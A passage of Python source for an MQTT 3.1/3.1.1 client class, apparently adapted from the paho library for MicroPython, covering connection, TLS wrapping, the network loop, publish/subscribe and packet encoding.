self._topic = value
class Client(object):
"""MQTT version 3.1/3.1.1 client class.
This is the main class for use communicating with an MQTT broker.
"""
def __init__(self, client_id="", clean_session=True, userdata=None, protocol=MQTTv31):
if not clean_session and (client_id == "" or client_id is None):
raise ValueError('A client id must be provided if clean session is False.')
self._clean_session = clean_session
self._protocol = protocol
self._userdata = userdata
self._sock = None
self._keepalive = 60
self._message_retry = 20
self._last_retry_check = 0
# [MQTT-3.1.3-4] Client Id must be UTF-8 encoded string.
if client_id == "" or client_id is None:
if protocol == MQTTv31:
pass # self._client_id = base62(uuid.uuid4().int, padding=22)
else:
self._client_id = b""
else:
self._client_id = client_id
if isinstance(self._client_id, str):
self._client_id = self._client_id.encode('utf-8')
self._username = ""
self._password = ""
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet = []
self._current_out_packet = None
self._last_msg_in = time_func()
self._last_msg_out = time_func()
self._reconnect_min_delay = 1
self._reconnect_max_delay = 120
self._reconnect_delay = None
self._ping_t = 0
self._last_mid = 0
self._state = mqtt_cs_new
self._out_messages = []
self._in_messages = []
self._max_inflight_messages = 20
self._inflight_messages = 0
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
self._on_message_filtered = []
self._host = ""
self._port = 1883
self._bind_address = ""
self._in_callback_mutex = threading.Lock()
self._out_packet_mutex = threading.Lock()
self._current_out_packet_mutex = threading.Lock() # RLock
self._msgtime_mutex = threading.Lock()
self._out_message_mutex = threading.Lock() # RLock
self._in_message_mutex = threading.Lock()
# Other mutexes:
# self._callback_mutex = threading.RLock() # Changing callback func and checking func exists - not necessary
# self._reconnect_delay_mutex = threading.Lock() # Changing and using reconnect delay - not necessary
# self._mid_generate_mutex = threading.Lock() # Creating next mid - good, but necessary?
self._thread = None
self._thread_terminate = False
self._ssl = False
# No default callbacks
self.on_log = None
self.on_connect = None
self.on_subscribe = None
self.on_message = None
self.on_publish = None
self.on_unsubscribe = None
self.on_disconnect = None
self._strict_protocol = False
def __del__(self):
pass
def _sock_recv(self, bufsize):
# sleep_ms(20)
try:
return self._sock.recv(bufsize)
except socket.error as err:
self._easy_log(MQTT_LOG_DEBUG, "_sock_recv err: " + str(err))
if DEBUG_PC:
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_READ:
raise WouldBlockError()
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_WRITE:
# self._call_socket_register_write()
raise WouldBlockError()
if err.errno == EAGAIN:
raise WouldBlockError()
raise
def _sock_send(self, buf):
try:
return self._sock.send(buf)
except socket.error as err:
self._easy_log(MQTT_LOG_DEBUG, "_sock_send err: " + str(err))
if DEBUG_PC:
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_READ:
raise WouldBlockError()
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_WRITE:
# self._call_socket_register_write()
raise WouldBlockError()
if err.errno == EAGAIN:
# self._call_socket_register_write()
raise WouldBlockError()
raise
def _sock_close(self):
"""Close the connection to the server."""
if not self._sock:
return
try:
sock = self._sock
self._sock = None
# self._call_socket_unregister_write(sock)
# self._call_socket_close(sock)
finally:
# In case a callback fails, still close the socket to avoid leaking the file descriptor.
sock.close()
def reinitialise(self, client_id="", clean_session=True, userdata=None):
if self._sock:
self._sock.close()
self._sock = None
self.__init__(client_id, clean_session, userdata)
def tls_set(self, ca_certs=None, certfile=None, keyfile=None, cert_reqs=None, tls_version=None, ciphers=None):
if ssl is None:
raise ValueError('This platform has no SSL/TLS.')
# TODO: Add ca_certs support if required, used in ssl.wrap_socket()
self._ssl = True
def tls_unset(self):
if ssl is None:
raise ValueError('This platform has no SSL/TLS.')
self._ssl = False
def connect(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker.
"""
# print("connect")
self.connect_async(host, port, keepalive, bind_address)
return self.reconnect()
def connect_async(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker asynchronously. This is a non-blocking
connect call that can be used with loop_start() to provide very quick
start.
"""
# print("connect_async")
if host is None or len(host) == 0:
raise ValueError('Invalid host.')
if port <= 0:
raise ValueError('Invalid port number.')
if keepalive < 0:
raise ValueError('Keepalive must be >=0.')
self._host = host
self._port = port
self._keepalive = keepalive
self._bind_address = bind_address
self._state = mqtt_cs_connect_async
def reconnect(self):
"""Reconnect the client after a disconnect. Can only be called after
connect()/connect_async()."""
# print("reconnect")
if len(self._host) == 0:
raise ValueError('Invalid host.')
if self._port <= 0:
raise ValueError('Invalid port number.')
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
with self._out_packet_mutex:
self._out_packet = []
with self._current_out_packet_mutex:
self._current_out_packet = None
with self._msgtime_mutex:
self._last_msg_in = time_func()
self._last_msg_out = time_func()
self._ping_t = 0
self._state = mqtt_cs_new
if self._sock:
self._sock.close()
self._sock = None
# print("self._sock = None")
# Put messages in progress in a valid state.
self._messages_reconnect_reset()
self._easy_log(MQTT_LOG_DEBUG, ">> sock.create_connection")
sock = self._create_socket_connection()
if self._ssl:
# TODO: Add ca_certs support if required
print(">> wrapping socket")
try:
sock = ssl.wrap_socket(sock, server_hostname=self._host) # , do_handshake_on_connect=False
except ssl.SSLError as e:
print(e)
except ValueError as e:
print(e)
sock = ssl.wrap_socket(sock)
# sock = ssl.wrap_socket(sock, do_handshake_on_connect=False)
except TypeError as e:
# Difference in Micropython (socket has internal SSLContext for "server_hostname") and Python (SSLContext)
print(e)
sock = ssl.wrap_socket(sock)
# sock = ssl.wrap_socket(sock)
sock.settimeout(self._keepalive)
print(">> socket handshake")
sock.do_handshake()
self._sock = sock
self._sock.setblocking(False)
if not DEBUG_PC:
self._poll = select.poll()
# self.fileno = self._sock.fileno()
self._poll.register(self._sock, select.POLLIN | select.POLLOUT | select.POLLERR | select.POLLHUP) #self.fileno)
return self._send_connect(self._keepalive)
def loop_forever(self, timeout=1000, max_packets=1, retry_first_connection=False):
run = True
while run:
if self._thread_terminate is True:
break
# if self._state == mqtt_cs_connect_async:
if not (self._state == mqtt_cs_new or self._state == mqtt_cs_connected):
try:
print(">> loop forever - reconnect top")
self.reconnect()
except (socket.error, OSError):
self._easy_log(MQTT_LOG_DEBUG, "Connection failed, retrying")
self._reconnect_wait()
else:
break
while run:
rc = MQTT_ERR_SUCCESS
while rc == MQTT_ERR_SUCCESS:
rc = self.loop(timeout, max_packets)
if (self._thread_terminate is True
and self._current_out_packet is None
and len(self._out_packet) == 0
and len(self._out_messages) == 0):
rc = 1
run = False
def should_exit():
return self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True
if should_exit():
run = False
else:
self._reconnect_wait()
if should_exit():
run = False
else:
try:
print(">> loop forever - reconnect bottom")
self.reconnect()
except (socket.error, OSError):
self._easy_log(MQTT_LOG_DEBUG, "Connection failed, retrying")
print("<< Breaking loop forever")
return rc
def loop_start(self):
if self._thread is not None:
return MQTT_ERR_INVAL
self._thread_terminate = False
self._thread = threading.Thread(target=self._thread_main)
threading.stack_size(12288 if not DEBUG_PC else 32768) # Increase stack size to allow for more stack frames (deeper nested functions)
self._thread.start()
def loop_stop(self):
if self._thread is None:
return MQTT_ERR_INVAL
self._thread_terminate = True
# if threading.current_thread() != self._thread:
# self._thread.join()
# self._thread = None
def loop(self, timeout=1000, max_packets=1):
"""Process network events.
"""
# print("loop")
if timeout < 0:
raise ValueError('Invalid timeout.')
with self._current_out_packet_mutex:
# print("self._current_out_packet =", self._current_out_packet)
with self._out_packet_mutex:
# print("self._out_packet =", self._out_packet)
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
# print("self._current_out_packet =", self._current_out_packet)
if self._current_out_packet:
if DEBUG_PC:
wlist = [self._sock]
elif self._sock:
self._poll.modify(self._sock, select.POLLIN | select.POLLOUT | select.POLLERR | select.POLLHUP)
else:
if DEBUG_PC:
wlist = []
elif self._sock:
self._poll.modify(self._sock, select.POLLIN | select.POLLERR | select.POLLHUP)
if DEBUG_PC:
rlist = [self._sock]
xlist = [self._sock]
try:
socklist = select.select(rlist, wlist, xlist, (timeout / 1000)) # timeout in seconds not ms
except TypeError:
# Socket isn't correct type, in likelihood connection is lost
return MQTT_ERR_CONN_LOST
except ValueError:
# Can occur if we just reconnected but rlist/wlist contain a -1 for some reason.
return MQTT_ERR_CONN_LOST
except Exception:
# Note that KeyboardInterrupt, etc. can still terminate since they are not derived from Exception
return MQTT_ERR_UNKNOWN
if self._sock in socklist[2]:
print("select/socket xlist error found!")
if self._sock in socklist[0]:
rc = self.loop_read(max_packets)
if rc or (self._sock is None):
return rc
if self._sock in socklist[1]:
rc = self.loop_write(max_packets)
if rc or (self._sock is None):
return rc
else:
events = self._poll.poll(timeout)
# print("events =", events)
for poll_obj, ev in events:
# print("event =", "pHUP" if ev & select.POLLHUP else "", "pERR" if ev & select.POLLERR else "", "pIN" if ev & select.POLLIN else "", "pOUT" if ev & select.POLLOUT else "")
if ev & select.POLLHUP or ev & select.POLLERR:
self._easy_log("poll/socket event error found! " + str(ev))
if ev & select.POLLIN:
rc = self.loop_read(max_packets)
if rc or (self._sock is None):
return rc
if ev & select.POLLOUT:
rc = self.loop_write(max_packets)
if rc or (self._sock is None):
return rc
return self.loop_misc()
def _publish_is_free(self):
# if self._current_out_packet_mutex.acquire(False) and self._out_packet_mutex.acquire(False):
return (self._current_out_packet is None and len(self._out_packet) == 0 and len(self._out_messages) == 0)
# return True
def publish(self, topic, payload=None, qos=0, retain=False):
"""Publish a message on a topic.
This causes a message to be sent to the broker and subsequently from
the broker to any clients subscribing to matching topics.
topic: The topic that the message should be published on.
payload: The actual message to send. If not given, or set to None a
zero length message will be used. Passing an int or float will result
in the payload being converted to a string representing that number. If
you wish to send a true int/float, use struct.pack() to create the
payload you require.
qos: The quality of service level to use.
retain: If set to true, the message will be set as the "last known
good"/retained message for the topic.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS to
indicate success or MQTT_ERR_NO_CONN if the client is not currently
connected. mid is the message ID for the publish request. The mid
value can be used to track the publish request by checking against the
mid argument in the on_publish() callback if it is defined.
A ValueError will be raised if topic is None, has zero length or is
invalid (contains a wildcard), if qos is not one of 0, 1 or 2, or if
the length of the payload is greater than 268435455 bytes."""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
topic = topic.encode('utf-8')
if self._topic_wildcard_len_check(topic) != MQTT_ERR_SUCCESS:
raise ValueError('Publish topic cannot contain wildcards.')
if qos < 0 or qos > 2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, str):
local_payload = payload.encode('utf-8')
elif isinstance(payload, (bytes, bytearray)):
local_payload = payload
elif isinstance(payload, (int, float)):
local_payload = str(payload).encode('ascii')
elif payload is None:
local_payload = b''
else:
raise TypeError('payload must be a string, bytes, bytearray, int, float or None.')
if len(local_payload) > 268435455:
raise ValueError('Payload too large.')
local_mid = self._mid_generate()
if qos == 0:
rc = self._send_publish(local_mid, topic, local_payload, qos, retain, False)
return (rc, local_mid)
else:
message = MQTTMessage(local_mid, topic)
message.timestamp = time_func()
message.payload = local_payload
message.qos = qos
message.retain = retain
message.dup = False
with self._out_message_mutex: # .acquire()
self._out_messages.append(message)
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
self._inflight_messages += 1
if qos == 1:
message.state = mqtt_ms_wait_for_puback
elif qos == 2:
message.state = mqtt_ms_wait_for_pubrec
# .release()
rc = self._send_publish(message.mid, topic, message.payload, message.qos, message.retain, message.dup)
# remove from inflight messages so it will be sent after a connection is made
if rc is MQTT_ERR_NO_CONN:
self._inflight_messages -= 1
message.state = mqtt_ms_publish
return (rc, local_mid)
else:
message.state = mqtt_ms_queued
# .release()
return (MQTT_ERR_SUCCESS, local_mid)
def username_pw_set(self, username, password=None):
"""Set a username and optionally a password for broker authentication.
Must be called before connect() to have any effect.
Requires a broker that supports MQTT v3.1.
username: The username to authenticate with. Need have no relationship to the client id. Must be unicode [MQTT-3.1.3-11].
Set to None to reset client back to not using username/password for broker authentication.
password: The password to authenticate with. Optional, set to None if not required. If it is unicode, then it
will be encoded as UTF-8.
"""
# [MQTT-3.1.3-11] User name must be UTF-8 encoded string
self._username = None if username is None else username.encode('utf-8')
self._password = password
if isinstance(self._password, str):
self._password = self._password.encode('utf-8')
def disconnect(self):
"""Disconnect a connected client from the broker."""
self._state = mqtt_cs_disconnecting
if self._sock is None:
return MQTT_ERR_NO_CONN
return self._send_disconnect()
def subscribe(self, topic, qos=0):
"""Subscribe the client to one or more topics."""
# print("subscribe")
topic_qos_list = None
if isinstance(topic, str):
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
topic_qos_list = [(topic.encode('utf-8'), qos)]
elif isinstance(topic, tuple):
if topic[1]<0 or topic[1]>2:
raise ValueError('Invalid QoS level.')
if topic[0] is None or len(topic[0]) == 0 or not isinstance(topic[0], str):
raise ValueError('Invalid topic.')
topic_qos_list = [(topic[0].encode('utf-8'), topic[1])]
elif isinstance(topic, list):
topic_qos_list = []
for t in topic:
if t[1]<0 or t[1]>2:
raise ValueError('Invalid QoS level.')
if t[0] is None or len(t[0]) == 0 or not isinstance(t[0], str):
raise ValueError('Invalid topic.')
topic_qos_list.append((t[0].encode('utf-8'), t[1]))
if topic_qos_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_subscribe(False, topic_qos_list)
def unsubscribe(self, topic):
"""Unsubscribe the client from one or more topics."""
topic_list = None
if topic is None:
raise ValueError('Invalid topic.')
if isinstance(topic, str):
if len(topic) == 0:
raise ValueError('Invalid topic.')
topic_list = [topic.encode('utf-8')]
elif isinstance(topic, list):
topic_list = []
for t in topic:
if len(t) == 0 or not isinstance(t, str):
raise ValueError('Invalid topic.')
topic_list.append(t.encode('utf-8'))
if topic_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_unsubscribe(False, topic_list)
def loop_read(self, max_packets=1):
"""Process read network events. """
# print("loop_read")
if self._sock is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_messages) + len(self._in_messages)
print("max_packets =", max_packets)
max_packets = 1
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_read()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def loop_write(self, max_packets=1):
"""Process write network events."""
# print("loop_write")
if self._sock is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_packet) + 1
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_write()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def loop_misc(self):
"""Process miscellaneous network events."""
# print("loop_misc")
if self._sock is None:
return MQTT_ERR_NO_CONN
now = time_func()
self._check_keepalive()
if self._last_retry_check + 1 < now:
# Only check once a second at most
self._message_retry_check()
self._last_retry_check = now
if self._ping_t > 0 and now - self._ping_t >= self._keepalive:
# client->ping_t != 0 means we are waiting for a pingresp.
# This hasn't happened in the keepalive time so we should disconnect.
self._sock_close()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
# rc = 1 # offical library
rc = MQTT_ERR_CONN_LOST
if self.on_disconnect:
with self._in_callback_mutex:
self.user_data_set("dc in loop_misc")
self.on_disconnect(self, self._userdata, rc)
return MQTT_ERR_CONN_LOST
return MQTT_ERR_SUCCESS
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way
through their network flow at once. Defaults to 20."""
if inflight < 0:
raise ValueError('Invalid inflight.')
self._max_inflight_messages = inflight
def message_retry_set(self, retry):
"""Set the timeout in seconds before a message with QoS>0 is retried.
20 seconds by default."""
if retry < 0:
raise ValueError('Invalid retry.')
self._message_retry = retry
def user_data_set(self, userdata):
"""Set the user data variable passed to callbacks. May be any data type."""
self._userdata = userdata
def will_set(self, topic, payload=None, qos=0, retain=False):
"""Set a Will to be sent by the broker in case the client disconnects unexpectedly.
This must be called before connect() to have any effect.
topic: The topic that the will message should be published on.
payload: The message to send as a will. If not given, or set to None a
zero length message will be used as the will. Passing an int or float
will result in the payload being converted to a string representing
that number. If you wish to send a true int/float, use struct.pack() to
create the payload you require.
qos: The quality of service level to use for the will.
retain: If set to true, the will message will be set as the "last known
good"/retained message for the topic.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length.
"""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, bytes):
self._will_payload = payload
elif isinstance(payload, str):
self._will_payload = payload.encode('utf-8')
elif isinstance(payload, bytearray):
self._will_payload = payload
elif isinstance(payload, int) or isinstance(payload, float):
self._will_payload = str(payload)
elif payload is None:
self._will_payload = None
else:
raise TypeError('payload must be a utf-8 bytes, string, bytearray, int, float or None.')
self._will = True
self._will_topic = topic.encode('utf-8')
self._will_qos = qos
self._will_retain = retain
def will_clear(self):
""" Removes a will that was previously configured with will_set().
Must be called before connect() to have any effect."""
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
def socket(self):
"""Return the socket or ssl object for this client."""
return self._sock
def message_callback_add(self, sub, callback):
"""Register a message callback for a specific topic.
Messages that match 'sub' will be passed to 'callback'. Any
non-matching messages will be passed to the default on_message
callback.
Call multiple times with different 'sub' to define multiple topic
specific callbacks.
Topic specific callbacks may be removed with
message_callback_remove()."""
if callback is None or sub is None:
raise ValueError("sub and callback must both be defined.")
for i in range(0, len(self._on_message_filtered)):
if self._on_message_filtered[i][0] == sub:
self._on_message_filtered[i] = (sub, callback)
return
self._on_message_filtered.append((sub, callback))
def message_callback_remove(self, sub):
"""Remove a message callback previously registered with
message_callback_add()."""
if sub is None:
raise ValueError("sub must defined.")
for i in range(0, len(self._on_message_filtered)):
if self._on_message_filtered[i][0] == sub:
self._on_message_filtered.pop(i)
return
# ============================================================
# Private functions
# ============================================================
def _loop_rc_handle(self, rc):
if rc:
self._easy_log(MQTT_LOG_WARNING, "Disconnecting because of Reason Code {}".format(rc))
self._sock_close()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
if self.on_disconnect:
with self._in_callback_mutex:
self.user_data_set("dc in _loop_rc_handle")
self.on_disconnect(self, self._userdata, rc)
return rc
def _packet_read(self):
# This gets called if pselect() indicates that there is network data
# available - ie. at least one byte. What we do depends on what data we
# already have.
# If we've not got a command, attempt to read one and save it. This should
# always work because it's only a single byte.
# Then try to read the remaining length. This may fail because it is may
# be more than one byte - will need to save data pending next read if it
# does fail.
# Then try to read the remaining payload, where 'payload' here means the
# combined variable header and actual payload. This is the most likely to
# fail due to longer length, so save current data and current position.
# After all data is read, send to _mqtt_handle_packet() to deal with.
# Finally, free the memory and reset everything to starting conditions.
# print("_packet_read")
if self._in_packet['command'] == 0:
try:
command = self._sock_recv(1)
except WouldBlockError:
return MQTT_ERR_AGAIN
except socket.error as err:
self._easy_log(MQTT_LOG_ERR, "failed to receive on socket1: " + str(err))
return 1
else:
if len(command) == 0:
print("_packet_read 1 error: cmd len is 0")
return 1
command, = struct.unpack("!B", command)
self._in_packet['command'] = command
if self._in_packet['have_remaining'] == 0:
# Read remaining
# Algorithm for decoding taken from pseudo code at
# http://publib.boulder.ibm.com/infocenter/wmbhelp/v6r0m0/topic/com.ibm.etools.mft.doc/ac10870_.htm
while True:
try:
byte = self._sock_recv(1)
except WouldBlockError:
return MQTT_ERR_AGAIN
except socket.error as err:
self._easy_log(MQTT_LOG_ERR, "failed to receive on socket2: " + str(err))
return 1
else:
if len(byte) == 0:
print("_packet_read 2 error: byte len is 0")
return 1
byte, = struct.unpack("!B", byte)
self._in_packet['remaining_count'].append(byte)
# Max 4 bytes length for remaining length as defined by protocol.
# Anything more likely means a broken/malicious client.
if len(self._in_packet['remaining_count']) > 4:
return MQTT_ERR_PROTOCOL
self._in_packet['remaining_length'] += (byte & 127) * self._in_packet['remaining_mult']
self._in_packet['remaining_mult'] = self._in_packet['remaining_mult'] * 128
if (byte & 128) == 0:
break
self._in_packet['have_remaining'] = 1
self._in_packet['to_process'] = self._in_packet['remaining_length']
while self._in_packet['to_process'] > 0:
try:
data = self._sock_recv(self._in_packet['to_process'])
except WouldBlockError:
return MQTT_ERR_AGAIN
except socket.error as err:
self._easy_log(MQTT_LOG_ERR, "failed to receive on socket3: " + str(err))
return 1
else:
if len(data) == 0:
print("_packet_read 3 error: data len is 0")
return 1
self._in_packet['to_process'] -= len(data)
self._in_packet['packet'] += data
# All data for this packet is read.
self._in_packet['pos'] = 0
rc = self._packet_handle()
# Free data and reset values
self._in_packet = dict(
command=0,
have_remaining=0,
remaining_count=[],
remaining_mult=1,
remaining_length=0,
packet=b"",
to_process=0,
pos=0)
with self._msgtime_mutex:
self._last_msg_in = time_func()
return rc
def _packet_write(self):
# print("_packet_write")
self._current_out_packet_mutex.acquire()
while self._current_out_packet:
packet = self._current_out_packet
try:
write_length = self._sock_send(packet['packet'][packet['pos']:])
except (AttributeError, ValueError):
self._current_out_packet_mutex.release()
return MQTT_ERR_SUCCESS
except WouldBlockError:
self._current_out_packet_mutex.release()
return MQTT_ERR_AGAIN
except socket.error as err:
self._current_out_packet_mutex.release()
self._easy_log(MQTT_LOG_ERR, "failed to receive on socket: " + str(err))
return 1
if write_length > 0:
packet['to_process'] -= write_length
packet['pos'] += write_length
if packet['to_process'] == 0:
if (packet['command'] & 0xF0) == PUBLISH and packet['qos'] == 0:
if self.on_publish:
with self._in_callback_mutex:
self.on_publish(self, self._userdata, packet['mid'])
if (packet['command'] & 0xF0) == DISCONNECT:
self._current_out_packet_mutex.release()
with self._msgtime_mutex:
self._last_msg_out = time_func()
if self.on_disconnect:
with self._in_callback_mutex:
self.user_data_set("dc in _packet_write")
self.on_disconnect(self, self._userdata, MQTT_ERR_SUCCESS)
if self._sock:
self._sock.close()
self._sock = None
return MQTT_ERR_SUCCESS
with self._out_packet_mutex:
if len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
else:
self._current_out_packet = None
else:
break
self._current_out_packet_mutex.release()
with self._msgtime_mutex:
self._last_msg_out = time_func()
# print("_p_w _current_out_packet =", self._current_out_packet)
return MQTT_ERR_SUCCESS
def _easy_log(self, level, fmt, *args):
if self.on_log is not None:
buf = fmt % args
try:
self.on_log(self, self._userdata, level, buf)
except Exception:
# Can't _easy_log this, as we'll recurse until we break
pass # self._logger will pick this up, so we're fine
def _check_keepalive(self):
if self._keepalive == 0:
return MQTT_ERR_SUCCESS
now = time_func()
with self._msgtime_mutex:
last_msg_out = self._last_msg_out
last_msg_in = self._last_msg_in
if self._sock is not None and (now - last_msg_out >= self._keepalive or now - last_msg_in >= self._keepalive):
if self._state == mqtt_cs_connected and self._ping_t == 0:
self._send_pingreq()
with self._msgtime_mutex:
self._last_msg_out = now
self._last_msg_in = now
else:
self._sock_close()
print("ping expired: msg_out %ds, msg_in %ds", (now - last_msg_out - self._keepalive), (now - last_msg_in - self._keepalive))
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
# rc = 1 # offical library
rc = MQTT_ERR_CONN_LOST
if self.on_disconnect:
with self._in_callback_mutex:
self.user_data_set("dc in _check_keepalive")
self.on_disconnect(self, self._userdata, rc)
def _mid_generate(self):
self._last_mid = self._last_mid + 1
if self._last_mid == 65536:
self._last_mid = 1
return self._last_mid
@staticmethod
def _topic_wildcard_len_check(topic):
# Search for + or # in a topic. Return MQTT_ERR_INVAL if found.
# Also returns MQTT_ERR_INVAL if the topic string is too long.
# Returns MQTT_ERR_SUCCESS if everything is fine.
if b'+' in topic or b'#' in topic or len(topic) == 0 or len(topic) > 65535:
return MQTT_ERR_INVAL
else:
return MQTT_ERR_SUCCESS
def _send_pingreq(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGREQ")
rc = self._send_simple_command(PINGREQ)
if rc == MQTT_ERR_SUCCESS:
self._ping_t = time_func()
return rc
def _send_pingresp(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGRESP")
return self._send_simple_command(PINGRESP)
def _send_puback(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBACK (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBACK, mid, False)
def _send_pubcomp(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBCOMP (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBCOMP, mid, False)
def _pack_remaining_length(self, packet, remaining_length):
remaining_bytes = []
while True:
byte = remaining_length % 128
remaining_length = remaining_length // 128
# If there are more digits to encode, set the top bit of this digit
if remaining_length > 0:
byte = byte | 0x80
remaining_bytes.append(byte)
# packet.append(byte)
packet.extend(struct.pack("!B", byte))
if remaining_length == 0:
# FIXME - this doesn't deal with incorrectly large payloads
return packet
def _pack_str16(self, packet, data):
if isinstance(data, str):
data = data.encode('utf-8')
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
def _send_publish(self, mid, topic, payload=b'', qos=0, retain=False, dup=False):
# we assume that topic and payload are already properly encoded
assert not isinstance(topic, str) and not isinstance(payload, str) and payload is not None
if self._sock is None:
return MQTT_ERR_NO_CONN
# utopic = topic.encode('utf-8')
command = PUBLISH | ((dup & 0x1) << 3) | (qos << 1) | retain
packet = bytearray()
packet.append(command) # packet.extend(struct.pack("!B", command))
payloadlen = len(payload)
remaining_length = 2 + len(topic) + payloadlen
if payloadlen == 0:
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+str(topic)+"' (NULL payload)")
else:
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+str(topic)+"', ... ("+str(payloadlen)+" bytes)")
if qos > 0:
# For message id
remaining_length += 2
self._pack_remaining_length(packet, remaining_length)
self._pack_str16(packet, topic)
if qos > 0:
# For message id
packet.extend(struct.pack("!H", mid))
packet.extend(payload)
return self._packet_queue(PUBLISH, packet, mid, qos)
def _send_pubrec(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREC (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREC, mid, False)
def _send_pubrel(self, mid): #, dup=False
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREL (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREL | 2, mid, False) #, dup)
def _send_command_with_mid(self, command, mid, dup):
# For PUBACK, PUBCOMP, PUBREC, and PUBREL
if dup:
command = command | 0x8
remaining_length = 2
packet = struct.pack('!BBH', command, remaining_length, mid)
return self._packet_queue(command, packet, mid, 1)
def _send_simple_command(self, command):
# For DISCONNECT, PINGREQ and PINGRESP
remaining_length = 0
packet = struct.pack('!BB', command, remaining_length)
return self._packet_queue(command, packet, 0, 0)
def _send_connect(self, keepalive):
# print("_send_connect")
if self._protocol == MQTTv31:
protocol = PROTOCOL_NAMEv31
proto_ver = 3
else:
protocol = PROTOCOL_NAMEv311
proto_ver = 4
remaining_length = 2 + len(protocol) + 1 + 1 + 2 + 2 + len(self._client_id)
connect_flags = 0
if self._clean_session:
connect_flags = connect_flags | 0x02
if self._will:
remaining_length = remaining_length + 2 + len(self._will_topic) + 2 + (0 if self._will_payload is None else len(self._will_payload))
connect_flags = connect_flags | 0x04 | ((self._will_qos & 0x03) << 3) | ((self._will_retain & 0x01) << 5)
if self._username:
remaining_length = remaining_length + 2 + len(self._username)
connect_flags = connect_flags | 0x80
if self._password:
connect_flags = connect_flags | 0x40
remaining_length = remaining_length + 2 + len(self._password)
command = CONNECT
packet = bytearray()
packet.extend(struct.pack("!B", command)) # packet.append(command)
self._pack_remaining_length(packet, remaining_length)
packet.extend(struct.pack("!H" + str(len(protocol)) + "sBBH", len(protocol), protocol, proto_ver, connect_flags, keepalive))
self._pack_str16(packet, self._client_id)
if self._will:
self._pack_str16(packet, self._will_topic)
if self._will_payload is None or len(self._will_payload) == 0:
packet.extend(struct.pack("!H", 0))
else:
self._pack_str16(packet, self._will_payload)
if self._username:
self._pack_str16(packet, self._username)
if self._password:
self._pack_str16(packet, self._password)
self._keepalive = keepalive
self._easy_log(MQTT_LOG_DEBUG, "Sending CONNECT (u{}, p{}, wr{}, wq{}, wf{}, c{}, k{}) client_id={}".format(
(connect_flags & 0x80) >> 7,
(connect_flags & 0x40) >> 6,
(connect_flags & 0x20) >> 5,
(connect_flags & 0x18) >> 3,
(connect_flags & 0x4) >> 2,
(connect_flags & 0x2) >> 1,
keepalive,
self._client_id
))
return self._packet_queue(command, packet, 0, 0)
def _send_disconnect(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending DISCONNECT")
return self._send_simple_command(DISCONNECT)
def _send_subscribe(self, dup, topics):
# print("_send_subscribe")
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2 + len(t[0]) + 1
command = SUBSCRIBE | (dup << 3) | 0x2 # (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command)) # packet.append(command)
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t[0])
